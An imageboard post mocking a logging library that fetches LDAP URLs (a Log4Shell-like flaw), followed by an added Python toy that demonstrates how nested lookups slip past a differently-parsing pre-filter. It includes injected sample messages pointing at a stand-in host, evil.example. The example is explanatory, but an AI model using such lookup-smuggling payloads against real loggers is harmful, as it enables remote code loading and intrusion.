6/17/2025, 6:03:02 PM
>>105621959
>i used a third party library for printing a log to stdout
>that third party library included a million features i knew nothing about
>so that library parsed ldap urls and fetched and executed them
>i discovered this a decade later
>it's a remote execution vulnerability... but it kinda isn't because it is an intentional feature of the library i used
>i reacted to this by using a different library to parse parts of the string before it gets parsed by the logger to filter it
>but that different library implemented the url differently
>so someone could inject urls into the urls and use the library parser to get something to the other parser library used by that logging library
or you could have just printed your log to stdout
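The parser differential the post describes, as an added example that is not part of the original thread or of any real logging library: a toy logger that expands `${...}` lookups in the message and then "fetches" any ldap:// URL left behind, a pre-filter built on a second parser (urllib.parse) that inspects the raw message before the logger sees it, and the reply's alternative of printing the message untouched. The `${lower:...}` / `${upper:...}` lookup syntax, the ldap-fetching behaviour and the sample log messages are all constructed for this example.

```python
from __future__ import annotations

import re
from urllib.parse import urlparse

# Constructed toy lookup syntax: ${lower:TEXT} and ${upper:TEXT}, resolved
# innermost-first and repeatedly, so nested lookups build up new text.
_LOOKUP = re.compile(r"\$\{([^${}]*)\}")
# What the toy logger treats as a URL once expansion is done.
_URL = re.compile(r"\b([a-z][a-z0-9+.-]*)://\S+", re.IGNORECASE)


def _resolve(expr: str) -> str:
    """Resolve one lookup body. Unknown lookups expand to nothing."""
    kind, _, arg = expr.partition(":")
    if kind == "lower":
        return arg.lower()
    if kind == "upper":
        return arg.upper()
    return ""


def expand_lookups(msg: str, max_rounds: int = 16) -> str:
    """Expand ${...} lookups until the message stops changing (bounded)."""
    for _ in range(max_rounds):
        new = _LOOKUP.sub(lambda m: _resolve(m.group(1)), msg)
        if new == msg:
            break
        msg = new
    return msg


def vulnerable_log(msg: str) -> tuple[str, list[str]]:
    """Toy 'feature-rich' logger: expands lookups in the message, then records
    every ldap:// URL it would go and fetch. Returns (emitted line, fetched URLs)."""
    line = expand_lookups(msg)
    fetched = [m.group(0) for m in _URL.finditer(line) if m.group(1).lower() == "ldap"]
    return line, fetched


def filter_sees_ldap(msg: str) -> bool:
    """The 'different library' pre-filter from the post: run urllib.parse over the
    raw, unexpanded message and reject anything whose scheme is ldap."""
    return any(urlparse(tok).scheme == "ldap" for tok in msg.split())


def filtered_log(msg: str) -> tuple[str, list[str]] | None:
    """Pre-filter, then hand the message to the feature-rich logger.
    Returns None when the filter rejects the message."""
    if filter_sees_ldap(msg):
        return None
    return vulnerable_log(msg)


def plain_log(msg: str) -> tuple[str, list[str]]:
    """The reply's alternative: the message is opaque data, nothing is interpreted."""
    return msg, []


if __name__ == "__main__":
    # Constructed sample messages. The second one never contains the literal
    # text "ldap://" until the logger's own lookup expansion creates it, so the
    # urlparse-based filter (which sees "${lower:LDAP}" as no scheme at all)
    # passes it straight through to the parser that does the fetching.
    direct = "user ldap://evil.example/x logged in"
    nested = "user ${lower:LDAP}://evil.example/x logged in"
    for m in (direct, nested):
        print("filter rejects:", filter_sees_ldap(m), "| filtered_log:", filtered_log(m))
        print("plain_log:", plain_log(m))
```

The filter and the logger disagree about what counts as a URL because they parse at different points and by different rules; the only version that is safe regardless of that disagreement is the one that performs no interpretation of the message at all.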